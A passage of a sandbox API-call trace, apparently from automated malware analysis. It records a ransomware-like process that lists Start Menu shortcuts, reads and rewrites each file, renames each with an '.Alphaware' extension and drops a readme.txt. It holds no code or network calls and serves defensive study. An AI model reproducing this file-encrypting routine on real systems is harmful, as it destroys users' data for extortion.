ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.068] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0100.068] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2a53d8cd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0x0, dwReserved1=0x0, cFileName="Command Prompt.lnk", cAlternateFileName="COMMAN~1.LNK")) returned 1 [0100.068] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0100.068] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2d73a72a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notepad.lnk", cAlternateFileName="")) returned 1 [0100.068] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfec52d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Run.lnk", cAlternateFileName="")) returned 1 [0100.068] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed7c750, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0100.068] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0100.068] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0100.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e618) returned 1 [0100.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0100.068] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk", dwFileAttributes=0x80) returned 1 [0100.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0100.070] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25004a8 | out: lpFileInformation=0x25004a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2a53d8cd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x500)) returned 1 [0100.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0100.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0100.070] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0100.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0100.070] ReadFile (in: hFile=0x250, lpBuffer=0x2500ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x2500ce0*, lpNumberOfBytesRead=0x23e818*=0x500, lpOverlapped=0x0) returned 1 [0100.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0100.097] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0100.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0100.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0100.101] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8ddcb740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x788)) returned 1 [0100.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0100.101] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk.alphaware")) returned 1 [0100.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e728) returned 1 [0100.104] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0100.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e698) returned 1 [0100.107] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini", dwFileAttributes=0x80) returned 1 [0100.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0100.108] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x2586c40 | out: lpFileInformation=0x2586c40*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2a6)) returned 1 [0100.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0100.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0100.108] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0100.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0100.109] ReadFile (in: hFile=0x250, lpBuffer=0x2587208, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x2587208*, lpNumberOfBytesRead=0x23e818*=0x2a6, lpOverlapped=0x0) returned 1 [0100.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0100.142] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0100.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0100.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0100.146] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8de3db60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x460)) returned 1 [0100.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0100.146] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini.alphaware")) returned 1 [0100.149] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk", dwFileAttributes=0x80) returned 1 [0100.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0100.151] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2407ab0 | out: lpFileInformation=0x2407ab0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2d73a72a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x518)) returned 1 [0100.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0100.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0100.151] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0100.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0100.151] ReadFile (in: hFile=0x250, lpBuffer=0x24082e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x24082e8*, lpNumberOfBytesRead=0x23e818*=0x518, lpOverlapped=0x0) returned 1 [0100.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0100.176] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0100.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0100.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0100.179] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8de89e20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x7a0)) returned 1 [0100.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0100.180] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk.alphaware")) returned 1 [0100.182] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk", dwFileAttributes=0x80) returned 1 [0100.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0100.184] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk"), fInfoLevelId=0x0, lpFileInformation=0x248ac48 | out: lpFileInformation=0x248ac48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfec52d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106)) returned 1 [0100.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0100.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0100.184] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0100.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0100.184] ReadFile (in: hFile=0x250, lpBuffer=0x248b050, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x248b050*, lpNumberOfBytesRead=0x23e818*=0x106, lpOverlapped=0x0) returned 1 [0100.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0100.212] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0100.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0100.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0100.216] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8ded60e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x234)) returned 1 [0100.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0100.216] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk.alphaware")) returned 1 [0100.219] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk", dwFileAttributes=0x80) returned 1 [0100.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0100.220] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk"), fInfoLevelId=0x0, lpFileInformation=0x250a8b8 | out: lpFileInformation=0x250a8b8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc)) returned 1 [0100.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0100.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0100.220] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0100.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0100.220] ReadFile (in: hFile=0x250, lpBuffer=0x250b0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x250b0f8*, lpNumberOfBytesRead=0x23e818*=0x4cc, lpOverlapped=0x0) returned 1 [0100.245] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0100.245] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0100.246] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0100.247] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0100.247] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8df223a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x734)) returned 1 [0100.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0100.248] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk.alphaware")) returned 1 [0100.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0100.250] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8df223a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8df223a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.250] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0100.250] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, 